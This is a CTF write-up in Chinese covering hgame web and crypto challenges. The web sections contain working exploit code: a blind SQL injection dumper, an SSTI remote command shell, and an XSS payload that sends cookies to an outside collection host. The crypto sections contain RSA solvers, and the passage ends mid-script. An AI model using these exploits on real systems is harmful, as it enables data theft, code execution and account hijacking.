# Web

# Liki-Jail

Liki 上周提到这周要盲注，这就来了。

登录页，盲猜后端查询语句是这样的：

select xxx from xxx where username='xxxx' and password='xxxx';

然后就开始基于时间的盲注

慢慢试，摸了好几天，然后学了雨神去年的 wp，写了个脚本跑

这里利用了几个点：

绕过空格：/**/
引号绕过：使用十六进制

参考资料：SQL注入绕过技巧

import httpx
import time
import copy

session = httpx.Client(proxies={'all://':None})

def test(left, right, url, data):
    #二分法爆破
    while left < right:
        print(left,right)
        mid = (left + right) // 2
        temp = copy.deepcopy(data)
        temp['password'] = temp['password'].format(mid)
        print(temp)
        r = session.post(url,data=temp)
        if r.elapsed.seconds < 1.8:
            right = mid
        else:
            left = mid + 1
    return left

def str2hex(inputs:str):
    result="0x"
    data= inputs.encode('utf-8')
    for bit in data:
        bit_hex=hex(bit).replace("0x","")
        if len(bit_hex)==1:
            bit_hex="0"+bit_hex
        result+=bit_hex
    return result

def sql2payload(inputs):
    inputs = inputs.replace(' ','/**/')
    data = {'username':'\\',
            'password':'/**/or/**/if(({}),sleep(2),sleep(0))#'.format(inputs)}
    return data

#爆数据库名长度
sql = 'length(database())>{}'
DBNameLength = test(0,64,'https://jailbreak.liki.link/login.php',sql2payload(sql))
# DBNameLength = 9
print('数据库名长度'+str(DBNameLength))

#获取数据库名
sql = 'ascii(substr(database(),{},1))>{}'
DBName = ''
for pos in range(1,DBNameLength+1):
    _sql = sql.format(pos,'{}')
    DBName += chr(test(0,256,'https://jailbreak.liki.link/login.php',sql2payload(_sql)))
# DBName = 'week3sqli'
print(DBName)

#获取数据库表数量(默认只有一位)
sql = 'ascii(substr((select count(table_name) from information_schema.tables where table_schema like {}),1,1)) > {}'.format(str2hex(DBName),'{}')
tableLen = int(chr(test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(sql))))
# tableLen = 1
print('数据库中数据表数量为' + str(tableLen))

# 获取数据库表名
sql = 'ascii(substr((select table_name from information_schema.tables where table_schema like {} limit {},1),{},1)) > {}'.format(str2hex(DBName),'{}','{}','{}')
tableNames = []
for tablePos in range(tableLen):
    # 逐个表名爆
    _sql = sql.format(tablePos,'{}','{}')
    tableName = ''
    pos = 1
    while 1:
        #逐字
        __sql = _sql.format(pos,'{}')
        word = test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(__sql))
        if word == 0:
            tableNames.append(tableName)
            break
        tableName += chr(word)
        pos += 1
# tableNames = ['u5ers']
print(tableNames)

# 获取表字段数(默认只有一位)
sql = 'ascii(substr((select count(column_name) from information_schema.columns where table_name like {}),1,1)) > {}'
tablesColumnNum = {} # 各表的字段数
for tableName in tableNames:
    _sql = sql.format(str2hex(tableName),'{}')
    tableColumnNum = int(chr(test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(_sql))))
    tablesColumnNum[tableName] = tableColumnNum
# tablesColumnNum = {'u5ers': 2}
print(tablesColumnNum)

# 获取表字段名
sql = 'ascii(substr((select column_name from information_schema.columns where table_name like {} limit {},1),{},1)) > {}'
tablesColumns = {}
for tableName in tableNames:
    _sql = sql.format(str2hex(tableName),'{}','{}','{}')
    columnNames = []
    for columnPos in range(tablesColumnNum[tableName]):
        # 逐个字段名爆
        __sql = _sql.format(columnPos,'{}','{}')
        columnName = ''
        pos = 1
        while 1:
            #逐字
            ___sql = __sql.format(pos,'{}')
            word = test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(___sql))
            if word == 0:
                columnNames.append(columnName)
                break
            columnName += chr(word)
            pos += 1
    tablesColumns[tableName] = columnNames
# tablesColumns = {'u5ers': ['usern@me', 'p@ssword']}
print(tablesColumns)

# 获取字段内容量
sql = 'ascii(substr((select count(`{}`) from {}.{}),1,1))>{}'
tablesColumnsNum = {}
for tableName in tableNames:
    tablesColumnsNum[tableName] = {}
    for column in tablesColumns[tableName]:
        _sql = sql.format(column, DBName, tableName, '{}')
        tablesColumnsNum[tableName][column] = int(chr(test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(_sql))))
# tablesColumnsNum = {'u5ers': {'usern@me': 1, 'p@ssword': 1}}
print(tablesColumnsNum)

# 获取字段内容
sql = 'ascii(substr((select `{}` from {}.{} limit {},1),{},1))>{}'
columnContents = {}
for tableName in tableNames:
    columnContents[tableName] = {}
    for column in tablesColumnsNum[tableName]:
        columnContents[tableName][column] = []
        for offset in range(tablesColumnsNum[tableName][column]):
            columnContent = ''
            pos = 1
            while 1:
                #逐字
                _sql = sql.format(column, DBName, tableName, offset, pos, '{}')
                word = test(0,255,'https://jailbreak.liki.link/login.php',sql2payload(_sql))
                if word == 0:
                    columnContents[tableName][column].append(columnContent)
                    break
                columnContent += chr(word)
                pos += 1
print(columnContents)

hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}

# Forgetful

这题和 Flask 的 SSTI 漏洞有关

dict：保存类实例或对象实例的属性变量键值对字典

class：返回调用的参数类型

mro：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。

bases：返回类型列表

subclasses：返回object的子类

init：类的初始化方法

globals：函数会以字典类型返回当前位置的全部全局变量与 func_globals 等价

注册账号后进行测试

''.__class__.__mro__[2]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]

查看详情，获取到基类

这里是 Firefox 自动把未闭合标签闭合了，右键查看网页源代码可以看到正常输出

然后获取该基类的子类：

找重载过的 __init__ 类，（在获取初始化属性后，带 wrapper 的说明没有重载，寻找不带 warpper 的）

返回为这样的是没有重载的：

                
                <slot wrapper '__init__' of 'object' objects>

这样是有重载的：

                
                <unbound method WarningMessage.__init__>

写了程序来试：

import httpx
from bs4 import BeautifulSoup

session = httpx.Client(proxies={'all://':None})
r = session.get('https://todolist.liki.link/login')
# print(r.content)
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
print(csrf_token)
loginData = {'csrf_token':csrf_token,'username':'test520','password':'test520','submit':'登录'}
r = session.post('https://todolist.liki.link/login',data=loginData)
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
for i in range(100):
    payload = '{}.__class__.__bases__[0].__subclasses__()['+str(i)+'].__init__'
    addData = {'csrf_token':csrf_token,'title':'{{'+payload+'}}','status':'1','submit':'提交'}
    print(addData)
    r = session.post('https://todolist.liki.link/',data=addData)
    soup = BeautifulSoup(r,'lxml')
    csrf_token = soup.find('input',id='csrf_token')['value']
    detailLink = soup.findAll('a',class_='btn-warning')[-1]['href']
    print(detailLink,end='\n\n')
    r = session.get('https://todolist.liki.link'+detailLink)
    output = r.content.decode()[r.content.decode().index('当前Todo: ')+8:r.content.decode().index('</h4><br>\n    <h4 class="modal-title" id="myModalLabel" align="center">是否完成')]
    print(output,end='\n\n')
    output.index('wrapper') # 利用index找不到会报错来终止程序

爆破发现第64个子类重载了 __init__

获取子类可用的函数：

                
                {{{}.__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']}}

发现 eval 可调用

利用 eval 就能执行命令，索性直接包装成程序：

import httpx
from bs4 import BeautifulSoup

session = httpx.Client(proxies={'all://':None})
r = session.get('https://todolist.liki.link/login')
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
print(csrf_token)
loginData = {'csrf_token':csrf_token,'username':'test520','password':'test520','submit':'登录'}
r = session.post('https://todolist.liki.link/login',data=loginData)
csrf_token = BeautifulSoup(r,'lxml').find('input',id='csrf_token')['value']
while 1:
    command = input('请输入命令：')
    payload = "{}.__class__.__bases__[0].__subclasses__()[64].__init__.__globals__.__builtins__['eval']('__import__(\"os\").popen(\""+command+"\").read()')"
    addData = {'csrf_token':csrf_token,'title':'{{'+payload+'}}','status':'1','submit':'提交'}
    # print(addData)
    r = session.post('https://todolist.liki.link/',data=addData)
    soup = BeautifulSoup(r,'lxml')
    csrf_token = soup.find('input',id='csrf_token')['value']
    detailLink = soup.findAll('a',class_='btn-warning')[-1]['href']
    # print(detailLink,end='\n\n')
    r = session.get('https://todolist.liki.link'+detailLink)
    try:
        output = r.content.decode()[r.content.decode().index('当前Todo: ')+8:r.content.decode().index('</h4><br>\n    <h4 class="modal-title" id="myModalLabel" align="center">是否完成')]
        print(output, end='\n\n')
    except:
        print('解析出错', end='\n\n')

输入命令找到flag文件

尝试了cat，tac，more ，less一堆，都不行。盲猜后台根据输出内容直接限制了。

最后使用：

                
                od -c ../flag

hgame{h0w_4bou7+L3arn!ng~PythOn^Now?}

还可以读取后转为base64输出（因为其他题目做不下去于是把源码扒出来看了一遍）

也可以这样 md5 一下

# Post to zuckonit2.0

审查一下网页源码

之前过于在意 js 的操作，直接就奔着调试器去了，没有认真看网页源码，卡了好几天。

源码下载下来以后，查看过滤部分

再看如何调用的

了解完试如何正则之后，Post：

<iframe s src="/replace">

成功插入

然后利用 replacement 和已经插入页面的 “replace”，向 iframe 插入xss代码

先尝试 alert(1) :

因为替换操作在html中执行，所以要注意不要破环执行替换的 script

先使用 iframe 的 srcdoc 元素将 html 插入 iframe 中

设计payload为：

"srcdoc="<script>alert(1)</script>

为保证不破坏执行替换的 script 同时保证插入成功，将：

                
                "srcdoc="

转为

                
                \"srcdoc=\"

将：

<script>alert(1)</script>

使用unicode编码（也可使用其他编码形式，只要保证[<>]不被过滤即可）：

                
                &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

最终 payload：

                
                \"srcdoc=\"&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

成功插入

同理开始尝试插入xss代码：

插入成功

后台成功收到

提交给机器人

然后。。。没有响应？

然后就是和学长的一番攀谈交心，想起机器人是访问主界面，所以我应该在主界面中再嵌入一个 iframe ，指向preview界面

再 Post 一个：

<iframe s src="/preview">

成功收到

设置 cookie 拿到 flag

hgame{simple_csp_bypass&a_small_mistake_on_the_replace_function}

# Post to zuckonit another version

和前一题一样，也是先审查源码

这题过滤多了一点

同样也是 preview 的网页做替换工作

不管别的，iframe 先提交再说

<iframe s src="/preview">

然后利用那个替换是使用js做替换而且对替换的内容不做处理

先匹配：

                
                (.)iframe src=..preview..(.)

这样就定位到我们提交的iframe的位置了，后面使用或 ‘|’ ，同时还能夹带私货

利用了 RegExp 和他的属性 ‘g’ ，然后再利用正则，把iframe的<>号抓出来给img标签用，

：

                
                (.)iframe src=..preview..(.)|($1img src=x onerror=javascript:this.src='http://xss.www.cn/index.php?do=keepsession&id=LaXxXm&url='+escape(document.location)+'&cookie='+escape(document.cookie);$2)

这样预期效果就是：

                
                <b class="search_result">(.)iframe src=..preview..(.)|(<img src=x onerror=javascript:this.src='http://xss.www.cn/index.php?do=keepsession&amp;id=LaXxXm&amp;url='+escape(document.location)+'&amp;cookie='+escape(document.cookie);>)</b>

提交查询：

                
                (.)iframe src=..preview..(.)|($1img src=x onerror=javascript:this.src='http://xss.www.cn/index.php?do=keepsession&id=LaXxXm&url='+escape(document.location)+'&cookie='+escape(document.cookie);$2)

本地测试成功

提交给机器人

查看服务器记录（我的xss平台出了点问题导致收不到消息，索性直接翻记录）

拿到token

搞定

hgame{CSP_iS_VerY_5trlct&<0nly_C@n_uSe_3vil.Js>!}

# Arknights

r4u十连了！r4u没出夕和年！r4u自闭了！r4u写了个抽卡模拟器想要证明自己不是非酋，这一切都是鹰角的错。r4u用git部署到了自己的服务器上，然而这一切都被大黑客liki看在了眼里。

这题从题目就可以知道从 git 入手。

用 githacker 获取文件

进行代码审计

发现有反序列化

同时得到如何正确传递反序列化的信息 base64结合md5

查看反序列化触发的位置

尝试构造 payload

复制黏贴再改一改，弄个exp

然后写一个脚本处理 payload

反序列化成功，看到Liki坏坏

然后就是漫长的摸索，利用 CardsPool 中的 _construct 和_toString ，再配合Eeeeeeevalllllllll 中的 echo 读取文件，是个任意文件读取漏洞。

<?php
class CardsPool
{
    public $cards;
    private $file;
    public function __construct($filePath)
    {
        $this->file = $filePath;
    }

    public function __toString(){
        return file_get_contents($this->file);
    }
}

class Eeeeeeevallllllll{
    public $msg="坏坏liki到此一游";
    public function __destruct()
    {
        echo $this->msg;
    }
}

$test = new Eeeeeeevallllllll();
$test->msg = new CardsPool("./pool.php");
print_r(serialize($test));

要注意类型，private和protected的变量名前都是有0×00的，print_r的输出由于是NULL就空过去了。这个小细节没有注意到，倒腾了半个晚上。（实际上我知道这个细节，但是我以为只是空字符没有显示出来，但是复制的时候应该会一起复制走，所以一直没有在意这个点，要深刻反思。）

拿到读取文件的 payload ，丢到脚本里

                
                O:17:"Eeeeeeevallllllll":1:{s:3:"msg";O:9:"CardsPool":2:{s:5:"cards";N;s:15:"CardsPoolfile";s:10:"./pool.php";}}

一定要记住在private和protected的变量名前都是有0×00的

import base64
import hashlib

data = 'O:17:"Eeeeeeevallllllll":1:{s:3:"msg";O:9:"CardsPool":2:{s:5:"cards";N;s:15:"\000CardsPool\000file";s:10:"./pool.php";}\}'
SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9"
session = base64.b64encode(data.encode(encoding='UTF-8'))+b'.'+base64.b64encode(hashlib.md5(data.encode()+SECRET_KEY.encode()).hexdigest().encode())
print(session)

填入 cookies

成功读到pool.php

本来以为 pool.php 里头藏了 flag。

结果 flag 是在 flag.php 中，Liki说没能找到 flag ，我还以为 flag 很难找，直接把获取文件内容的程序给完善了一下，结果试第一个就出了。

import base64
import hashlib
import httpx

while 1:
    fileName = input('请输入文件地址：')
    fileNameLen = str(len(fileName))
    data = 'O:17:"Eeeeeeevallllllll":1:{s:3:"msg";O:9:"CardsPool":2:{s:5:"cards";N;s:15:"\000CardsPool\000file";s:'+fileNameLen+':"'+fileName+'";}\}'
    print(data,end='\n\n')
    SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9"
    session = base64.b64encode(data.encode(encoding='UTF-8'))+b'.'+base64.b64encode(hashlib.md5(data.encode()+SECRET_KEY.encode()).hexdigest().encode())
    # print(str(session)[2:-1])
    cookies = {"session": str(session)[2:-1]}
    r = httpx.get('http://7a4f4e2209.arknights.r4u.top/', cookies=cookies).content.decode()
    try:
        temp = r[:r.index('<html lang="en">')] # 截取有用的信息（index.php会导致出错以外）
        print()
        print(temp)
    except:
        print('页面出错')

hgame{XI-4Nd-n!AN-D0e5Nt_eX|5T~4t_ALL}

# Crypto

# LikiPrime

先看一下加密的操作，先将 secrets 数组随机排序，然后分别取出前两个数丢入 get_ prime 求出 p 和 q。

盲猜 secrets 数组不会很大，那么多次获取 n 后，其中必有两个n有公因数。

然后手动获取几次题目，得到多个 n 。

用mgpy2获取一下公因数

成功找到公因数

然后就是枯燥无味的解 rsa

程序如下：

import libnum
import gmpy2

n1 = 15361898878235696574667000105109009720717806584760935092206242960407549236363501417213696346370999607974104247856479458833772412536980365740161717369268547876567930581662460946856562030722330783421995955447378594119758550329759849393535018344139103042143621239011469955648205934903904045564846822159998174879695774419450399723970148270141003002902927002767984254099972288746243481084381643719731958360702561818663569730597624966561268824737610893516032068613120089855690580047620589196079907477458543783300282393495461746306096415443274084362956267239186823089349090398919748814938872938478097065267156231648487203329412422615711711886164634059723362167236118521458497248305115764510762731915291882155494011713295462603221439763218477455674584662524137991730891776826849188975650354165106378834014987695592746836998002232826678339919918799781246827459617082687425955430641815518416878015728514477287192934193957833532996687234554280263817068106805440848475668830505180172049674756979856286907198648267160926305328986853052888831678087029867946180609
n4 = 421455057268137623943855130581826670010695787424125483575398783564641774905804241292094489491404078010368108928231613739378723057196150707763465076771136743887645743792429480337282665191759113905477351452687604661932370910619546649016980309127128704196912889482436113968301664065184802718403275566441932610997838594420744542725625369089835898603884842465873796137333422231217780558151579081453050482442480815713888023371806097009026733010675549168891531151463031503487769392933638449687974608310761364013663291522776340420167405179984536987822494653321337710666264607937131444597274723705263700984857724662081511434489432816220704052315794796230167061558323844739991577641137696139034976971120620834491839241524445976160628900208801061487721646073517819705813251737814356857934453635408899953424969351058921296535525652898586206280209211087519688645250498739129308658938793887643661637996930074323463006606640585599948898238215245556143193851301551383887774188493552615734925951375671527105352667838542450376183473659889822337657230288458000424954333331834433907473691512894898086048720146460663598870040517907120196975276637127036440898039790209438552282020873298963230557096195193902471386173063723634310986768157543053601652714130206963511431257764438989910441943467289675619031395812709310167158659929161987322371800772519783732871894602265094632055380313123658370805468895787729810268846662992731442880220367708567278281843728984797991757598241852368778190227221175774287545383420379099242654130282377896190210795413408748016644535143361607704202467109948719631940792634390275040458367000189214605637090341180044461262953283617909526333216836128142485173545881624151994087766224484640246053456234479338867653975606192972308839814170537240390050106021010619105914041749046002023056938838926351260981952851515505853011166663176323135014528257604319991192189816385407590212177524311727412317597062063787864210480343719978961417331119404148767646681957170467643999483804166353759472618987061249
c = 7927187628026055322783940901550651937893953660065534609714001711924456963095603013667085470146144874981960574233466397443449977149997357471575431695025415526421127927424585253533999961265066779103259623451208111709082292139347059312149137665426462381816329178229484680275368657450003046701355985014009700915439417466826446848877329284810802949440433122207430136944380576095681081740197798597559437163702511712448892986978229285577672410865991889634686024629071902793778620692548548234276678653195648305462703623579369309956481606223043040903082180559720551235515700080661234190693094571406679557502413049745325301747588707839920522910923018864009003988475371258742969932381590308381543035539043149634871622927695645953044249331889058081699783884965964986919852075768119185486506729958481688848547730131040350180411446263394686119546781350542737049112800140601734883325024073000156078427592350484379976615561586860882656403198952361411599125358422676828954908797542225611418969233985502900316342896903161811894061826308302594273209131132802270416006
e = 65537

p = gmpy2.gcd(n1,n4)
q = n1//p
print(p)
print(q)
d = libnum.invmod(e, (p - 1) * (q - 1))
print(d)
m = pow(c, d, n1)
print(m)
print(libnum.n2s(int(m)))

hgame{Mers3nne~Pr!Me^re4l1y_s0+5O-li7tle!}

# HappyNewYear

这题考的是低加密指数广播攻击，利用中国剩余定理。

直接写程序：

import gmpy2
import libnum
import itertools

n1 = 768731284506327944113406236027267453153178504481960474163849413572959901900781941471060120664615036667721568236486104212543941626093683611820051956888999990409535944068510533828285247642295156383062225121123397420863524500301605790432399020453905305067131509497931914214431033157498386840010234482484177898191608673445690542041959091445418878375877435164674203776931738708624804301646179653019817596612876848617302959482364008286148292002918372774353441375602500755004724814787928356594079344361596836482525021434616271982920662313256530007883018720585047232121289721656963132683682023625683229940587959315583539720857557451681402228168096559968476948263356605729649774017109848808425693506724312264272613164411551780892434255749213128692122454364559986018251379167331425321803760454026945039856860491038669974395683809854790365463840636343980962376205540013015629307389934488725537142983815565534720739509012176887290320329127809218230756596181528831774086891633290341399153631178022171655153576793324046302349267421556220063264261739968103953460444018066381487941305190730721608513048181450127628562770702172658088836581698332318905758721984778545449145728049393279394785952324627362503706190204128637631213405674863660425389313259
c1 = 722725267571877807402319081826628305252544883884335241258703688920929757984818470073041479840921480077113183869560758029121565524819466778712481183488277905449328223533043391590093655773827799575075615676500130199172201779452716348108026696828323022993975174610207567571651550333881731147356813019258889551558181283524226640533248278854011492561134943798149661873706769482776061146298693713915393175945083367889987571681776927122583376239974702806044792299381370488664195802017823240811394180509440609967345141141653389746431284893972530735438955464348280960825325776483554008537527538106398207335688261344254017151889931214151508915480961509920681364352778795068266724879364096996252272841617341643666522563974346452491302969822483901472736908002176995244808285202644542949151920310938882432565101197174787422479197405599503943928375781580538374853471395003088467545128060029187794431891563377967647568991772201040537299188867383732391802781253804314567562657951501684710262276597091279719861829006628377575073875781088939946651128183090724290607438597560193321130496240482260573568646971658130695308585240404956802017929673317521572608385674052894773447205932790060730005333539795323555614705817665786476411351969424168366962370578

n2 = 524955549822701108820249448341549471789542970374297220719644144467046120999708435027269809717491708384591502747843811858599256578006152409861521624800414221049434790169883523654257416906811451131195855586244598374880878692418389200238536952258677438654818096236001665540878733993916070969439309600669058216532381285131220090854384696479702333190547690812990714884526122724065211294733252863353053612662498096532976972273019631446622835704720241172866721075241553118399444619649756067546482948914446034527197029043296867226467390140262361175465932673129685497666662167082114259368591713670044469780955810420060714389043507570707061129150071885165680539302629323340904857078380746639406842784054066196290404127562974351550470732956889057701068241533469665269708040337792974792839671609064624273734488264409908037327963582749939131119285299618565955038449080047185142908091099286222071106259434530841587125509988124634728986309920606439740930811537598857558982632237868734857663853645411122621117175983417162818791869180350737709034243602399686004808133116046260847513863100560285962053110278579574895754928960943506584372424062481234806423574610837438057911596190771344568064718882123247708570545980147637910744997312960997877114875563
c2 = 341106636902364624537621803937059683829500847731737217024477947229102117868841270816391462580424161421481323287279560344771837711680149251407621544732737892160496443939357041950388493554496406007658435517211507967374859158779641371713073809459356957664870385022506283994639885012608754343497740963582877475346528865751238785898641641562644419639994889039921662499512792397994326679297072288344988329863729467521185656908541750681614296631331948235836697947639517519093825102735706418368162081693311580728579264440449951888361065347124447876814670051679652280281965491150266115964128635848848265679743499256971016535195477416889144131600175159747033626985115139696085153828051183257884668367446309997650590293659781294222777784435987334384194429993199873061206563903159227361936901013994702046575677089263288115905540761147293222721696340819505305497691052766999798297905368576684359681315851605714974267829409740228043899512270242579080482164570677517245195783188509338962785491871370414414487565392656794817257748899014632689366928706013426731920865802714147114118673053353872356444566840336431784793686607763099763915943769968162453433779091468653936247489610842351714130350853888962620401435016019892000066519489369586647822582532

n3 = 531816715051067911629200567254640608407895151120321915934223550416084055941810057275647124365372164691799815654324843152835621657219143971510794565282438719132189708357084269561390602533348667210778967547331570345307713271797500472800693615897738386357322760213782607288672639158771643480519455699144535885754570631972814751649211026584146963569748660071519399459076694805787216533150149579905553101555997182221446716574345192297201707280470099673168021522276021573255431147391095907444654303966368362618307277890450431646680417082866906543559655835992081835168319097576418799442472634041439781110915814527860626840035884588953837943723302497813966476632638781785524454419556109443369209786353302330932241171298568309190081206636347720214268688100661670856945137179076232753814259674913102806389336950363047338944420468292248719856587641014569194752277829684619803918722245724677129232358305719548783148527753735258295780607510739074337299037254055287750082818921964088131910307180760939784520021579399465657665634960365680711736311232219221704752502361047780644838828947578962833367751773943513294960723081845674700714114613905708967183234219078662548527491691822238226973730089750314606177285702898595711912716069746542235493085749
c3 = 96655501480984228476843527875038148766862682735216531181731365068856421448884071634422050543257015201836409006098564512948671369804995159104827331853700167554494548064655395947790619030027666553546707921275511050067552520015915189711919816240838635843727117678456359153157042256845391879627204005136329626204082446757707275024018932620919979573721462329490962992796317057293975350138690301006093906543825995442041881912668467639058815752449994459671712370905576936766284703593791336731603543492278087975208438906947966054673189424532474872122585340933934837935650393646216239318131268109344918651250925428018278665569580645117439459587437729735009669592816057201053074978283319149894796397333902672858475161613255814596817201545193202169499144055305358584644635503323032680354835638327999633796089419073741897835010300917603325122563734141907765815188906909017245236242853269976816696795439826925876239600449014662736919205840699787188466436497530759889271878272675511804209502453822900397006767975864334707665149166220819464748535531766670263050223009402082194467219438612279935716319300498861153496030333202808928006701019408354471055774090532330704743753190920815655232618981877529057446430825964256948001465214314349394508264556

n4 = 493772253520028701228394073791118796898860642546293517165976340880188671501170757992157937835809864375957661380376149183362237960714624594301301578885724183490678033704978135608268473206365825232902155458695063561942608980565675676060170247587203833300205781482210306978615656217675258493239504539762213919984146477146352995349444904282648001338541091894423167804984256356783623092953892148062097076194840351505254447228339051915162949343535017563167413299991340194548813782360554779507722510592683811398509607473468601404587617569337150824778600883884616204746234575349549906287741463102675096118386062231492163458668021511751022439191080507345540921839703382290445797046739813648289321292589201149955672085687445193343364105492343611293348540598587286909499000234416955201612299458282688515658596600656417554161895812046994316423241245289735327450704642000340929459813500971266436908790234452643087694195334024560701562917342963860276789458845939794177422833059051673483227332372905969868740556412782843128761060670334188293944421019131514119696008065850631880588123929581097844255625593530935229341774189341909782979667383762706038731196861300615117475933625813147094849135055190312732335084507955724604696171453417718094964090327
c4 = 357103586677133190400275535608298307096755517917743991779928165944808156555143364562652658318257441161780966754082431346703420213047464905801347987429587866507784835294289240703319363713980965945263022810877492245609589053923882000898807593180841308987573262209122953930711801088265031627560104571585260900206878593365521048031056818241791513449270437055503002833594299287048995560742435886215547766657105383700364572345248814440024509278757886084274494794572349604428103225636768278633773471700470592729438598821712944805975639637427494951822994991131521067141611563925956037672180261640035716517421681741527507431981163704929952037747170161617798150545493396732644456871805542270699764392127056902381387198947947443962667595072777104565429494042828509588406057498452896606672079600318076629291832964611485077778334984817595747726526804076306703817160053516530370696172218743746676413884784385108888108803420106818173901070897426014100110652172248635456173774009497111567782846079335233333617278837527467186444919584161474044529784043912893406555209016056689227249614906221138535989446685926185643604698806909451119908925728900998397084501277736148437741526619184826982588354997162924650747731826227150677994598866694976617038952960

n5 = 400814713999150053337202998177245797185153318108582661287579898596310746501291974666347785576673046001863500878959207830917744556274546158919815600936114953314600540036576429657582500764669413652252770861966417840099061248948771555745832102924038855172611675048290264202872791337710865213077945592130795851795718608065812757968780578674701063411377538597424177722558867587781141897676300153523209675996201871155481412772845570976807158049274849081684209479884845355028703657648486318475977716075670243766212910039942550957289189946628261360037565354423094972917371572096203537186108596979722712819213554550645058717286550110465343100499845761528635976859006285823914211739843983972560292482778326983903018873698437828016668821516581220588836782094261582899393704029819851484331592269664479855215056764839779582417486366182524483986373098489636334412671358130389579972838029202609936524996601129648191606117951616875200119129837212604760319073283133589692257497994855882819655018727368441361317788278857721179085847352853038553208639836433059097775135452611114351766229800268321281856140246610438246783364320786390657242414430601000831387967976691362673290089725234013924339500819390840062916754623424132621350706544122257464089409619
c5 = 196373383105902290020944815248115178565096789884585292930623716947035208071024597949093015291460459688039044997141326097130071826293844614603464306742597764422862382005497313400758917851620553757103374309501021075747571843057781165101330819142446088116279098633113721577451389062207713330184173913814679087349450078308520703743712617560764419518421118924319893700795437644204733301627193873115633309760620284510790535125035058821049861371456491148507101291075161477427293354824377765129256775039894591945559511120167575652522441315757824060660730144970842971698502722588421031575495602989132763560631831054650312859575883607799879434734827000150732042760623153837096529339041007718789464168455505957010471222861988485628012999068075964645262827332446865072284660213544453081529030572364389186506108110484311864485900432885752933720505418233626286434177587041376262805920492740865402092716512672643242061407641167432424410178764502786772854859640601859309316626050634279758623225955757842810086544305493826555445120223896047747445754110537277236254307766447437586975157089685397827540671890607699289450588156013811091193850313213188596446595791898264003078214830341703064110270245588623025485564465677065014954050674151068209958156338

n6 = 441219832102329113941862838660943233579215441091346336934528023475304109965596676163440394813272558320918420480386749091947802455423402857125233908206867132599069595323243154174569298961794344623241293553421864069389535348543832297805982907650367142721566803315107733852453608111246057981064164247187640480712312060234169292599096087422940380874435851795847673883946134398943282297673922785786134668939454715179979246505182510338437251221569074780060511794395438999419581907256239694239236674604727404688764447352994022067990843174130240669289888289862268588307778029283493265348667415910553064457513926134377522099641209108448559373422305901757344324758407462166774699512993336120173336911210734744313930970281023299709778006083933174113456436965150432387778607639217894522770756209157735203091790545289813873886244335031912734705230434179583023235199153300263399767468586679972093973609985111254951924071949408463935260725701129931726900345186925871556853670570762826122383762006869109981003180805851519716186506371242901187230433096494812063568936279012557322219782284461140361225650340807095328622016565443274256310194921729305097890315074292153303546235677671541793456589738387043928232044507842169173330728718482770626654501523
c6 = 343558577020588714429313020041093297550600511001840154137552216575748946157961591099597309730875847249609067088895567357040752583678766229661761073029178667941759812656095394713728367061506713413650132129245164858512061430944849306322427733297033654152161512931139895523891447055784674776356336721195602898082264703411052396223706491835615239898963965039349867576628181946954585002705252796231016445166027513456849060948360498081892030697906086173612576083651879166491789946438067179662219651062279317002050789871120333850272751224872129535742685201837098575125361312611392050300073462884046822571642883949673321736837838379514540827860219307938135197101094531402063240331559853201121385391076154875363696159228373299490035401297769928627372721885488091110000395742964536445855367746227395783716581955884641531132839080847770052153020914740561915612109449417203852452084551679817129684835596664222472806271699238429017096741164052056835664191547244480985004136162585874727015248038703376279042870253365410963230937309995702792020342080115661150163434949942290275789227674559517957243060077741816736950124894466197373209308598030218454826136754312091821659566499445097655483610010997986426784494466843809743836689209926943448276851733

n7 = 320869957563788427035277998523618265705625973417036901203569472342030237447625011870979141578128136960129467546914523329260071050471008896398606988171189642059908517956020915451465313985689287777861360309556861849062064900403692083060786557290591231962941942100771713703136018889848261749140840347546977823595556802430254803837030344591646012857122213227115215674470388548652140381296705772500445572224924018905225174265663584819356114341255408979866800339484643585303306817447453000684770518093577661102544212109378828711785073514863402442870264355300371516683912671007573320059261257897651899697566804513319774954294708303168788292037857134628186553450976637858562675039807897112079750384830264618639239956765667388939331303314191813126254254914926384279494115576997773080256600900034563434959593677148531401160281960526061723479161754555193979726656961515374019212153726594807142456303698775715290518062768887156433902187122160641097916121097179118289646514217696314956474472626420868486152421013284784863653299930875253371982327367991139126828286729539033382650687859412868137579309775440698502848241122394423129771442338402870863767769545005951064956498742874485207824630520777152431261010818838138655082911865834699807375008861
c7 = 78140898568960172537532399957542065079754785608196175653725188831315142763849427144477433109881196560183622027227087954674199188991855929146336784979764720497547685824735751948676073196869027199411668951578490599507331800328072699193016348570092942269398714025948091737017548105562834031699831877517521836116912407428829037729994348603578694187241194587650053966682616443757430366693816438822541572320426819962696790047344705617241989403482962642561340363553100861232083902828830416053526478120239416765009622649261419311221132287115995483736302156498238644085182807103157307755108774079839474373171678479879270772376918459752331416572057373104068315516826270820079207687778179443170979119272546974948398836020966295976732842161084596604333609962435508857188202619164351406760248161996398928399808794165750688251550333360521545271424876496939865803880625334341137443221883906301968050670219384464251470416581899246708055363762134459566859899715206435140188997349196902765578570516978378759650864568014586614460583304460504318729333658817066272120984875742815218722200593432648242043375439670923950493477821363923796229165231700852653002648050645561521640741356788087870305958215222979881662007309583380284362915245390595921375463156

questions = []
questions.append({'n':n1,'c':c1})
questions.append({'n':n2,'c':c2})
questions.append({'n':n3,'c':c3})
questions.append({'n':n4,'c':c4})
questions.append({'n':n5,'c':c5})
